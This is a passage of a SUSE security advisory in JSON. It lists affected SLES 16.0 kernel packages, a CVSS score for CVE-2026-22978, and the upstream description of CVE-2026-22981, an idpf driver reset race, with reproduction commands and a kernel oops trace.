"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22981",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22981"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: detach and close netdevs while handling a reset\n\nProtect the reset path from callbacks by setting the netdevs to detached\nstate and close any netdevs in UP state until the reset handling has\ncompleted. During a reset, the driver will de-allocate resources for the\nvport, and there is no guarantee that those will recover, which is why the\nexisting vport_ctrl_lock does not provide sufficient protection.\n\nidpf_detach_and_close() is called right before reset handling. If the\nreset handling succeeds, the netdevs state is recovered via call to\nidpf_attach_and_open(). If the reset handling fails the netdevs remain\ndown. The detach/down calls are protected with RTNL lock to avoid racing\nwith callbacks. On the recovery side the attach can be done without\nholding the RTNL lock as there are no callbacks expected at that point,\ndue to detach/close always being done first in that flow.\n\nThe previous logic restoring the netdevs state based on the\nIDPF_VPORT_UP_REQUESTED flag in the init task is not needed anymore, hence\nthe removal of idpf_set_vport_state(). The IDPF_VPORT_UP_REQUESTED is\nstill being used to restore the state of the netdevs following the reset,\nbut has no use outside of the reset handling flow.\n\nidpf_init_hard_reset() is converted to void, since it was used as such and\nthere is no error handling being done based on its return value.\n\nBefore this change, invoking hard and soft resets simultaneously will\ncause the driver to lose the vport state:\nip -br a\n\u003cinf\u003e\tUP\necho 1 \u003e /sys/class/net/ens801f0/device/reset\u0026 \\\nethtool -L ens801f0 combined 8\nip -br a\n\u003cinf\u003e\tDOWN\nip link set \u003cinf\u003e up\nip -br a\n\u003cinf\u003e\tDOWN\n\nAlso in case of a failure in the reset path, the netdev is left\nexposed to external callbacks, while vport resources are not\ninitialized, leading to a crash on subsequent ifup/down:\n[408471.398966] idpf 0000:83:00.0: HW reset detected\n[408471.411744] idpf 0000:83:00.0: Device HW Reset initiated\n[408472.277901] idpf 0000:83:00.0: The driver was unable to contact the device\u0027s firmware. Check that the FW is running. Driver state= 0x2\n[408508.125551] BUG: kernel NULL pointer dereference, address: 0000000000000078\n[408508.126112] #PF: supervisor read access in kernel mode\n[408508.126687] #PF: error_code(0x0000) - not-present page\n[408508.127256] PGD 2aae2f067 P4D 0\n[408508.127824] Oops: Oops: 0000 [#1] SMP NOPTI\n...\n[408508.130871] RIP: 0010:idpf_stop+0x39/0x70 [idpf]\n...\n[408508.139193] Call Trace:\n[408508.139637] \u003cTASK\u003e\n[408508.140077] __dev_close_many+0xbb/0x260\n[408508.140533] __dev_change_flags+0x1cf/0x280\n[408508.140987] netif_change_flags+0x26/0x70\n[408508.141434] dev_change_flags+0x3d/0xb0\n[408508.141878] devinet_ioctl+0x460/0x890\n[408508.142321] inet_ioctl+0x18e/0x1d0\n[408508.142762] ? _copy_to_user+0x22/0x70\n[408508.143207] sock_do_ioctl+0x3d/0xe0\n[408508.143652] sock_ioctl+0x10e/0x330\n[408508.144091] ? find_held_lock+0x2b/0x80\n[408508.144537] __x64_sys_ioctl+0x96/0xe0\n[408508.144979] do_syscall_64+0x79/0x3d0\n[408508.145415] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[408508.145860] RIP: 0033:0x7f3e0bb4caff",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
